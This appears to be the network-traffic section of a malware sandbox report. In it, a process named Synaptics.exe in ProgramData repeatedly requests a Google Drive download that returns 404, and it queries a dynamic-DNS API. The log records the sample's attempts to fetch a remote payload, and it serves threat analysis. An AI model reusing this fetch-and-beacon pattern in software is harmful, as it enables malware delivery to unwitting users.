14 | 192.168.2.3 | 49756 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49759 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49760 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.3 | 49761 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.3 | 49762 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.3 | 49763 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49741 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
20 | 192.168.2.3 | 49764 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
21 | 192.168.2.3 | 49765 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
22 | 192.168.2.3 | 49766 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
23 | 192.168.2.3 | 49767 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
24 | 192.168.2.3 | 49768 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
25 | 192.168.2.3 | 49769 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
26 | 192.168.2.3 | 49771 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
27 | 192.168.2.3 | 49772 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.3 | 49773 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.3 | 49776 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49742 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.3 | 49777 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.3 | 49739 | 69.42.215.252 | 80 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
May 27, 2022 04:38:15.388402939 CEST | 945 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
May 27, 2022 04:38:15.603662968 CEST | 950 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 May 2022 02:38:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Cache: MISS
Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49743 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.3 | 49744 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.3 | 49745 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49747 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49749 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49750 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49736 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:15 UTC | 0 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:15 UTC | 0 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 27 May 2022 02:38:15 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:15 UTC | 1 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fx4xJTZBja61kY__Ec4T6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:15 UTC | 3 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:15 UTC | 3 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49737 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:15 UTC | 0 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:15 UTC | 3 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:15 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-vpJfeg6kjn4Ijj-MdmjgMQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:15 UTC | 4 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WDIaMrYCGy2BiytqR-ZQ7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:15 UTC | 6 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:15 UTC | 6 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49751 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:20 UTC | 28 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:21 UTC | 31 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked
2022-05-27 02:38:21 UTC | 32 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xLqjLAwnUTWVbmwCR3m4Dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:21 UTC | 34 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
2022-05-27 02:38:21 UTC | 34 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.3 | 49752 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:21 UTC | 34 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
2022-05-27 02:38:21 UTC | 34 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:21 UTC | 36 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9nfiIg4R6U_M1dwLTw7FyQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:21 UTC | 37 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>
2022-05-27 02:38:21 UTC | 37 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49753 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:21 UTC | 34 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:21 UTC | 37 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 27 May 2022 02:38:21 GMT
Strict-Transport-Security: max-age=31536000
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:21 UTC | 39 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2OHPjf6y9NY3HVV-pbgiUg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:21 UTC | 40 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>
2022-05-27 02:38:21 UTC | 40 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49754 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:21 UTC | 37 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:21 UTC | 41 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 27 May 2022 02:38:21 GMT
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Server: ESF
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2022-05-27 02:38:21 UTC | 42 | IN | Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BzfEXWApUaIy2onkKQoLTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2022-05-27 02:38:21 UTC | 44 | IN | Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>
2022-05-27 02:38:21 UTC | 44 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                          14192.168.2.349756172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC40OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                                                          User-Agent: Synaptics.exe
                                                                                                                                                                                                                          Host: docs.google.com
                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                          2022-05-27 02:38:21 UTC44INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.3 | 49759 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | kBytes transferred | Direction | Data
2022-05-27 02:38:21 UTC | 44 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2022-05-27 02:38:22 UTC | 47 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                          Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                          Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.3 | 49760 | 172.217.168.14 | 443 | C:\ProgramData\Synaptics\Synaptics.exe

Timestamp | kBytes transferred | Direction | Data
